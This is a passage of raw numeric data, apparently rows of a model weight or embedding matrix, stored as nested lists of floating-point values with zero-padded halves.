0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.729589, 0.112658, 0.675898, -0.336865, -0.254751, 0.0643379, 0.5021, -0.0538335, 0.0406053, -0.304894, -0.443825, 0.547255, 0.0599714, 0.0266899, -0.0958293, 0.168121, -0.11976, 0.682601, 0.0167635, 0.191461, 0.0479033, -0.453829, -0.310589, 0.37594, 0.0998549, 0.065714, 0.0612793, 0.0620632, -0.336486, -0.0673402, -0.168225, -0.00719133, 0.196643, 0.0446141, 0.987812, 0.0147727, 0.0702065, -0.0600722, -0.0627842, -0.163283, 0.430716, 0.00642575, -0.386826, 0.119625, -0.295568, 0.0170996, 0.0520095, -0.864364, 0.402763, -0.077015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.247388, 0.792911, -0.132454, 0.161274, 1.14012, -0.329659, 0.353667, -0.589317, 0.024258, 1.27819, 0.0084919, 0.402595, -0.439306, -0.0192333, -0.998744, -0.463312, 0.073044, -0.255824, -0.00986245, -0.142528, -0.0191958, -0.612263, -1.38339, 0.444944, -0.017283, -0.16458, 0.0150944, -0.22909, 0.167663, -0.226227, -0.270657, -0.507354, -0.164545, 0.0969429, -1.20441, -0.0452849, -0.369099, -0.548998, 0.199264, 0.081023, 0.889728, 0.0200342, 1.00746, -0.0696541, -0.127238, -0.0270819, -0.0346142, 0.94756, -0.0552456, -0.210237, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.180807, -0.570626, 0.436743, -0.883083, -0.319819, -0.492644, -0.949463, 0.0384632, 0.0168526, -0.851796, -0.211086, -0.00168718, -0.168177, -0.00729817, -0.852042, 0.211964, -0.310566, -0.154219, 0.00407124, 0.380139, 0.00739629, -0.910222, -0.578126, -0.0988874, 0.0217413, 0.47989, 0.368369, 
-0.204906, 0.4492, -0.00464175, 0.226075, 0.552174, 0.207385, 0.885652, -0.948636, -0.0412515, 0.116175, 0.0694841, 0.330276, 0.202828, 0.235264, 0.0479741, -0.251403, 0.0993926, -0.426785, -0.0201418, 0.0234868, -0.802022, 0.278779, -0.168559, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.47892, 1.2871, -0.938928, 0.262533, 1.60644, -0.220725, 2.12993, 1.36376, -0.0329367, 0.714342, 1.39527, 0.227104, -0.321603, -0.041854, 2.93346, 1.69617, 0.745399, 0.527466, 0.0360963, 0.226359, -0.0248201, 1.37605, 0.759421, 0.168307, 0.115976, 1.17927, -0.653396, 0.0325196, -0.0497246, -1.37481, 0.57709, -0.0832312, -0.964925, 1.26421, 1.952, -0.0431341, 1.16608, -2.3457, 0.521465, 1.69015, -1.16953, 0.04511, -0.30578, -0.184225, -0.293229, -0.0365762, 0.02156, 1.56147, -2.06865, -0.928819, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.318507, 0.405146, -0.344651, 0.344257, -0.701639, 0.567023, 0.0466303, 0.245406, 0.0450979, -0.864855, -0.387773, 0.768798, -0.512714, 0.0102398, -0.00901638, -0.643767, 0.498701, 0.0399889, 0.00685545, 0.280909, -0.0281535, 0.651269, 0.881588, -0.34313, 0.00307558, 0.304569, -0.482396, 0.0760964, 0.98412, 0.115682, 0.259503, 0.175619, 0.389465, -1.42793, -2.08411, -0.0475116, 0.179477, 0.103614, 0.282592, -0.861473, 0.022265, -0.0157461, -0.605267, 0.0406237, -0.0566811, -0.0181706, -0.00611739, 0.0249707, -0.0539049, 0.881606, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.379815, -0.348553, -0.702222, -0.238573, -0.217435, -0.059657, 0.279486, 0.0613746, -0.0330884, 0.417958, -0.0895802, -0.784515, 0.195785, -0.0250295, 0.222762, 0.296419, -0.0392835, 0.497536, 0.044236, 0.0294126, -0.0181405, 0.973184, -0.163111, 0.0765692, 0.170353, 0.41911, -0.32013, 0.420475, 0.654433, 0.196752, 0.378422, -0.189982, -0.456989, 0.0161837, -0.227141, 0.024073, 0.162535, 0.157343, -0.00176002, 0.267483, 0.364821, 5.75713e-05, 0.160202, 0.104856, -0.280638, -0.0122689, -0.00935821, -0.0136912, -0.116335, 0.337038, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.047573, -0.70488, 0.232063, 0.541224, 0.458506, -0.779894, -3.45457, -1.34824, 0.0354759, -1.45502, 0.140387, 0.870942, -0.793585, -0.0213743, 0.4212, 0.312238, -0.00965672, 0.636229, -0.0245313, 0.541435, -0.0316692, 1.52162, -1.07882, -0.0211867, -0.00158622, -0.7712, 0.900012, -0.678212, -0.256284, -0.136088, 1.92318, 0.27123, -0.023535, 0.785091, 1.77769, -0.0213263, -1.29247, 0.817234, -1.84452, 0.862783, 0.582089, 0.0267654, 0.223323, -0.0470652, 1.42982, -0.025754, -0.0343958, 0.71102, 0.99479, -0.131373, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.3248, -0.221573, -0.406168, 0.10518, -0.125474, 0.155824, -0.224711, -0.074452, -0.0400846, 0.327342, 0.0935833, 0.182637, 0.123141, -0.0136812, -0.00554657, 0.792858, 0.271386, -0.00488239, -0.00785878, -0.015383, 0.0416131, 0.0901938, 0.0628613, 0.405325, 0.12679, 0.0699798, 0.216457, 0.232175, -0.0367014, -0.154477, 0.301841, -0.558342, 0.312232, -0.110182, -0.438168, -0.00279973, 
0.0558491, -0.00240973, -0.71455, 0.32696, 0.0553501, -0.0107543, -0.58053, 0.336786, -0.763228, -0.0315338, 0.0151786, 0.70586, -0.105148, -0.149071, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.233203, 0.597924, 0.953182, -0.0631562, 0.149021, 0.317116, 1.05936, 0.130693, -0.0262191, 0.970469, -0.58721, 0.234683, -1.93941, 0.0288919, 0.477509, 0.00293881, -0.59627, -0.641149, -0.00850786, -6.70303, 0.0416499, 0.839323, 0.731295, -0.128357, 0.109185, 0.00228434, -0.123364, -0.347153, -0.0557835, -0.138923, -0.672376, -0.452155, -0.191763, 0.75671, -0.688873, -0.00482313, 0.515634, 0.958622, 0.403178, -4.32566, -0.65437, -0.0319576, 0.119383, 0.566239, 1.27925, -0.0111889, -0.0170054, -0.86881, -0.70697, 0.251926, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.155434, -0.191065, 0.300237, -0.695974, -0.0422566, -1.07844, -1.0108, -0.360752, 0.0232174, -0.0764677, 0.48081, -0.517659, 0.124161, 0.00877031, -0.274443, 0.529959, -0.063243, 0.18698, -0.0410105, -0.227958, 0.0383169, 0.454479, -2.20717, 0.0839593, 0.0312447, -0.172857, -0.0314626, -0.360908, -0.0738391, 0.298878, 0.43378, 0.0367582, 0.0239608, 0.933334, -0.796445, -0.0273918, 0.314589, 0.0850768, -0.295888, 0.451286, -0.527668, -0.048249, -0.196029, -0.378056, -0.121939, 0.00296019, -0.0387556, -3.05914, -0.372575, -0.655964, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.461724, 0.131362, 
-0.0425768, 0.374773, -0.915179, 0.379161, 0.00368916, -0.102593, -0.0460907, -0.242696, -0.134491, -0.136481, -0.00141838, 0.0181283, -0.099732, -0.405784, -0.700849, 0.99136, 0.016356, 0.0455019, 0.0143304, 0.344399, -0.109911, -0.269121, -0.0254067, -0.397228, -1.22223, 0.644826, 0.0372552, 0.254558, 0.0426138, 0.121017, 0.922693, -0.246025, -0.290803, -0.0256374, -0.148557, 0.0316936, 0.362693, 0.163417, -1.36517, 0.00515182, -0.13619, 0.102412, 0.318097, -0.00483493, 0.0351694, 1.30737, -0.530693, 0.369668, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.381176, -0.079171, -0.0490211, -1.06469, -0.118514, 0.0563829, 0.926405, 0.398699, 0.00560341, 0.282437, -0.105513, -0.246609, 0.693747, 0.0286104, -0.359853, -0.237607, 0.0874205, -1.10613, -0.0183909, 0.00826366, -0.00413797, -0.0522972, 0.543728, 0.0184169, 0.120149, -0.910594, 0.452024, 0.188213, 0.414705, -0.158489, 0.240072, 0.15236, -0.0073444, -0.251548, 0.158114, 0.0333444, -0.0916095, 0.387552, -0.408052, 0.129291, 0.0560133, -0.0257425, -0.343125, 0.0711024, 0.556055, 0.0145786, -0.00291634, 1.65468, 0.424408, -0.0409948, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.272, 0.512, 0.4226, -0.0321, -0.206, 0.3933, 0.804, 0.368, 0.0123, 0.1891, 0.2017, 0.6167, -0.02666, -0.00376, 0.3167, 0.4739, -0.0096, 0.2112, -0.03214, 0.01808, 0.02882, -1.792, 
-0.2178, -0.4133, 0.154, -0.2847, -0.1554, 0.4724, -0.1749, -0.416, 0.0214, -0.452, 0.4736, 1.221, -2.295, -0.02231, -0.2603, 0.2349, 0.2412, 0.3154, 0.2761, 0.01654, -0.3228, -0.06616, 0.741, 0.02562, 0.01242, 0.7686, 0.6484, -0.03253], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2462, -0.02374, 0.1655, -0.0853, 0.0974, 0.0181, -0.01947, 0.004566, 0.014534, -0.1683, 0.0932, -0.02272, 0.0485, 0.00995, 0.0681, -0.1337, -0.1499, 0.0439, 0.0249, -0.1182, -0.0526, 0.02737, -0.03464, 0.0559, 0.11835, -0.266, -0.08075, -0.2308, -0.2144, -0.0999, -0.2062, 0.0759, -0.249, 0.1459, -0.4058, -0.02232, -0.1489, -0.0858, -0.1544, 0.11707, -0.0007815, -0.002453, 0.1724, -0.064, 0.08704, 0.04126, 0.04297, 0.01445, 0.02135, -0.05728], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3481, 0.2754, -0.2769, 0.4307, 0.1659, 0.00954, 0.0204, -0.05957, -0.04285, 0.3887, -0.04132, -0.3198, -0.648, -0.005695, 0.1827, -0.1062, 0.04404, 0.7344, -0.0392, -0.0876, 0.04822, 0.10364, 1.163, 0.2029, 0.1157, -0.00846, -0.1098, 0.5576, 0.1192, -0.02289, 0.01068, -0.17, -0.441, -0.405, -0.1697, 0.02606, -0.4158, -0.01055, 0.475, 0.1487, 0.0393, 0.00588, 0.7305, -0.01089, 0.09845, -0.01572, 0.03723, 1.1, -0.01872, -0.302], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.579, 1.523, -0.02689, -1.751, -1.782, -0.721, 1.304, -0.08844, 0.02148, 1.606, -1.138, -0.3188, -0.619, -0.02492, 1.126, 
-0.365, -1.647, 1.939, -0.03824, -1.481, 0.02498, 1.227, -1.713, -0.886, 0.09784, -0.171, -0.2479, 0.328, 0.968, -0.578, -0.7603, 0.02051, -0.07623, -1.49, 3.574, 0.005917, -0.4368, 0.7407, 0.5693, -0.218, 0.6167, -0.02373, 0.4685, -0.0877, -0.91, -0.04892, 0.03302, -0.7866, 0.8706, 0.944], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3225, -0.07135, 0.6094, -0.581, 0.2433, 0.1981, 1.255, 0.0407, 0.03494, -0.2893, 0.3796, -0.02942, 0.05496, -0.03345, -0.542, -0.4568, -0.0619, 0.0169, 0.0397, 0.3252, -0.01113, 0.3494, -0.594, -0.01904, 0.003265, 0.562, -0.756, -0.3547, 0.6826, 0.754, 0.1528, 0.1581, 0.4744, 0.09863, -3.139, 0.03043, -0.0793, 0.37, -0.1316, -0.0318, -0.525, 0.0466, 0.5938, 0.0936, -0.229, 0.01756, 0.001359, -0.488, -0.5566, -0.4011], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.359, 1.078, 0.7437, 0.5347, 1.283, 0.6123, -1.077, -0.299, 0.01581, 0.8667, -0.944, 0.1731, 0.3635, -0.005314, 0.5396, 1.083, -0.1274, 0.567, -0.01056, 0.337, -0.0287, -0.2141, 0.5444, 0.2878, 0.1327, 0.00271, 0.1406, 0.5635, -0.3044, -0.505, 0.3296, -0.471, 0.2856, -0.9897, 0.1038, 0.006126, 0.2153, 0.4775, 0.2257, 1.185, 0.03848, -0.0387, 0.2311, 0.0307, -0.6855, -0.02625, -0.02716, 1.908, 0.9, -0.1622], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.188, 0.1092, 0.4258, -0.1155, 0.2346, -0.2551, 0.00539, -0.6245, 0.0212, -0.1823, 0.2067, 0.584, 0.1583, 0.001888, 
0.5254, -0.09125, 0.2217, 0.479, 0.01483, -0.09845, -0.041, -0.3088, 0.1953, 0.05804, -0.06647, 0.1377, -0.1454, -0.1456, -0.4546, -0.2162, 0.2355, 0.05112, 0.4604, 0.7285, -1.1455, -0.02155, 0.0784, 0.1683, -0.3503, 0.1105, 0.5186, -0.00664, -0.326, -0.0696, -0.3691, -0.01614, 0.001441, 0.7017, 0.1993, -0.2915], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2742, -0.12036, -0.3315, -0.5645, -0.702, 0.191, 0.6655, 0.2429, 0.01302, -0.3992, -0.4595, 0.2502, 0.05197, 0.02182, -0.1218, 0.3308, -0.09955, 0.1444, 0.03497, 0.4172, 0.04886, 0.2812, -0.5317, 0.3745, 0.1311, 0.1177, -0.002731, 0.9224, 0.0957, 0.1687, 0.0777, 0.2429, -0.4155, -0.6143, 0.4941, 0.04324, 0.2778, 0.1677, -0.1047, -0.042, -0.972, -0.03546, -0.307, 0.163, 0.354, -0.01746, 0.01393, -1.877, -0.59, 0.2563], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3262, 1.382, 0.1628, -1.003, -2.562, -0.1646, 1.759, 0.12036, -0.04062, -0.874, -0.4263, 0.4834, -0.096, -0.01237, -0.2856, 0.1786, 0.2037, -0.244, 0.03247, 0.5366, -0.002325, -0.526, -0.1004, -0.1891, 0.1383, 0.5933, 0.2374, -0.512, 0.1065, -0.2365, -0.3376, -0.3494, -1.348, -0.876, -1.805, -0.04852, 0.2764, -0.3745, 0.1665, 0.0589, 0.0667, 0.00784, -0.06274, -0.0781, -0.02698, -0.02397, -0.009415, -0.8223, 0.062, -0.08295], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1869, 0.4666, -0.774, 0.1368, -0.2429, 0.04266, 0.4976, -0.2808, 
0.001888, 0.03342, 0.11566, 0.4915, -0.05908, -0.04684, -1.967, 0.0829, -0.657, -1.043, 0.02534, -0.2234, -0.03885, -0.1409, 0.824, 0.241, 0.02858, 0.27, -0.06232, -0.06415, 0.04166, -0.424, -0.1952, -0.2566, -0.6265, 0.005608, -1.164, 0.04596, -0.007866, -0.00887, -0.342, 0.602, 0.1299, 0.02554, -0.3555, 0.00654, 0.333, 0.03168, -0.03574, 0.636, 0.4338, 0.1322], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1802, -1.755, -0.558, 0.4302, 0.1289, -0.5645, 1.942, 0.4653, 0.01991, -0.2544, 0.3035, -1.421, -2.824, -0.03099, -0.4456, -2.623, 1.125, -1.966, 0.01941, -0.4355, 0.03238, 0.1378, 2.014, -0.11914, -0.03577, -0.526, -0.4949, 0.3623, -0.472, 0.351, 0.5063, 0.008736, 0.4607, 0.1143, -1.799, -0.02103, 0.2856, 0.0867, -0.0428, 0.4197, -5.45, -0.03757, 0.1647, 0.5674, 0.7866, -0.04456, 0.02464, 1.846, -1.12, -0.0437], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0882, -1.328, -0.11694, -0.3472, 0.1691, 0.04465, -2.627, -1.487, 0.004898, -0.3286, -0.079, 0.2238, -0.6934, 0.02528, 0.5063, -0.05374, 0.999, -0.776, 0.0009284, 0.06635, -0.02888, 0.1779, 0.345, -0.3555, 0.00437, -0.887, 0.8003, -0.2615, -0.6274, -0.0071, -0.0855, 0.007812, 1.073, -0.9033, -0.6855, -0.00852, 0.1959, 0.4045, 0.4622, -0.3103, 0.6387, -0.02963, -0.841, 0.2727, 1.288, -0.04062, -0.035, -0.6772, 0.3196, 0.0783], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.07855, 0.6567, -0.04376, 
-0.3833, -0.2463, 0.2896, 0.3328, -1.503, -0.010254, 0.2761, -0.4727, -0.736, 0.12067, -0.0372, -0.04242, 0.3945, 1.09, -0.4841, 0.0329, 0.1132, -0.014694, 0.3865, 0.3955, -0.1873, -0.004284, -0.7085, -0.485, -0.2211, 0.0996, 0.4978, 0.3713, 0.475, -0.0661, -1.973, -0.8057, -0.009674, 0.5225, -0.1318, 0.0737, -0.7744, -0.846, 0.01776, 0.2612, 0.644, -0.2488, -0.02705, -0.03778, 0.2118, 0.191, 0.02875], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3367, 0.5825, -0.5474, 0.6123, -0.8047, 0.0769, 0.01059, 0.2369, 0.0048, 0.8823, 0.3647, -0.627, 0.0966, 0.004494, -0.3298, -1.816, 0.1133, 1.207, -0.004265, 0.1186, 0.04092, 0.5913, -1.388, -0.3184, 0.08057, 0.03842, -0.389, 0.568, 0.2063, 0.3396, 0.0747, -0.05066, -0.3118, -0.5913, 2.188, -0.02853, 0.2783, -0.4902, 0.97, 0.4507, -1.456, -0.00643, 0.2437, 0.2136, -0.2878, 0.01087, -0.0423, -0.3665, -0.114, 0.3042], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.187, 0.3682, 0.4028, 0.04324, 0.5913, -0.3413, 0.2834, 0.00788, -0.00491, -0.2155, -0.1598, -0.217, -0.6685, 0.02069, 0.07214, -0.0763, 0.469, -0.713, 0.0289, -0.0881, 0.04453, -0.5474, -0.05997, -0.08435, 0.1396, 0.307, 0.04465, -0.0266, -0.0782, -0.277, -0.2173, -0.1936, 0.2505, -0.1301, 1.062, 0.0565, 0.5312, -0.2903, 0.6284, 0.0691, -0.4841, -0.0311, 0.764, -0.06555, -0.01124, -0.02606, 0.01091, 0.683, 0.02332, -0.3179], [0.0, 